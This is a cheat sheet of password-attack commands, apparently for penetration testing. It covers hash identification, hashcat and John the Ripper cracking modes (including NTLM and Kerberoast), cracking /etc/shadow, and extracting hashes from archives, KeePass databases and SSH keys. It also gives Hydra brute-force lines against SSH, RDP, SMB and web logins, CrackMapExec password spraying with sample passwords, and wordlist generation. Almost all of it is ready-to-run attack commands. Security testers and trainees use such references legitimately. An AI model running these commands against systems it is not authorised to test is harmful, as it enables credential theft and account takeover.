🔓 Password Attacks
Cracking, spraying, and credential attacks.
HASH CRACKING
Identify hash type
Determine algorithm before cracking — hashid or hash length
hashid '$2y$10$abc...'
hashid '5f4dcc3b5aa765d61d8327deb882cf99'
hash-identifier
Example Output
MD5: 32 hex chars
SHA1: 40 hex chars
SHA256: 64 hex chars
SHA512: 128 hex chars
bcrypt: $2a$ or $2y$ prefix
NTLMv2: username::domain:challenge:hash
Hashcat common modes
Quick reference for hash modes — Use hashcat -m
hashcat -m 0 hash.txt wordlist.txt # MD5
hashcat -m 100 hash.txt wordlist.txt # SHA1
hashcat -m 1000 hash.txt wordlist.txt # NTLM
hashcat -m 1800 hash.txt wordlist.txt # sha512crypt ($6$)
hashcat -m 500 hash.txt wordlist.txt # md5crypt ($1$)
hashcat -m 3200 hash.txt wordlist.txt # bcrypt
hashcat -m 13100 hash.txt wordlist.txt # Kerberoast (TGS-REP)
hashcat -m 18200 hash.txt wordlist.txt # AS-REP Roast
hashcat -m 5600 hash.txt wordlist.txt # NTLMv2
hashcat -m 1600 hash.txt wordlist.txt # Apache $apr1$ MD5
Hashcat with rules
Rules dramatically increase hit rate — Best rules for common passwords
hashcat -m 1000 hash.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 1000 hash.txt wordlist.txt -r /usr/share/hashcat/rules/rockyou-30000.rule
hashcat -m 1000 hash.txt wordlist.txt -r /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
John the Ripper
Alternative cracker — Good for mixed formats and auto-detect
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --wordlist=wordlist.txt --rules=best64
john --show hash.txt
Crack /etc/shadow
Unshadow then crack — Linux password hashes
unshadow /etc/passwd /etc/shadow > unshadowed.txt
hashcat -m 1800 unshadowed.txt /usr/share/wordlists/rockyou.txt
Crack zip/rar/pdf passwords
Extract hash then crack — Use *2john tools
zip2john protected.zip > zip.hash
rar2john protected.rar > rar.hash
pdf2john protected.pdf > pdf.hash
keepass2john database.kdbx > keepass.hash
ssh2john id_rsa > ssh.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
ONLINE BRUTE FORCE
Hydra common services
Target specific services — Adjust threads for reliability
hydra -l admin -P wordlist.txt $IP ssh -t 4
hydra -l admin -P wordlist.txt $IP ftp
hydra -l admin -P wordlist.txt $IP rdp
hydra -l admin -P wordlist.txt $IP smb
hydra -L users.txt -P wordlist.txt $IP http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
CrackMapExec password spraying
Spray one password across many users — Avoid lockouts
crackmapexec smb $IP -u users.txt -p 'Password1' --continue-on-success
crackmapexec smb $IP -u users.txt -p 'Summer2025!' --continue-on-success
crackmapexec winrm $IP -u users.txt -p 'Password1'
Custom wordlist generation
Create targeted wordlists — Company name, season, year patterns
# CeWL - scrape website for words
cewl http://$IP -m 5 -w cewl.txt
# Common patterns to try:
# CompanyName2025!
# Season+Year (Summer2025, Winter2024!)
# City+Numbers (London123)
# Username+123 or +! or +2025
Mutate wordlists
Add common suffixes/prefixes — Catch lazy password policies
# Using hashcat rules on a wordlist:
hashcat --stdout wordlist.txt -r /usr/share/hashcat/rules/best64.rule > mutated.txt
# Quick manual mutations:
for word in $(cat base.txt); do
echo "${word}1"; echo "${word}!"; echo "${word}123"
echo "${word}2025"; echo "${word}2024"
done > mutated.txt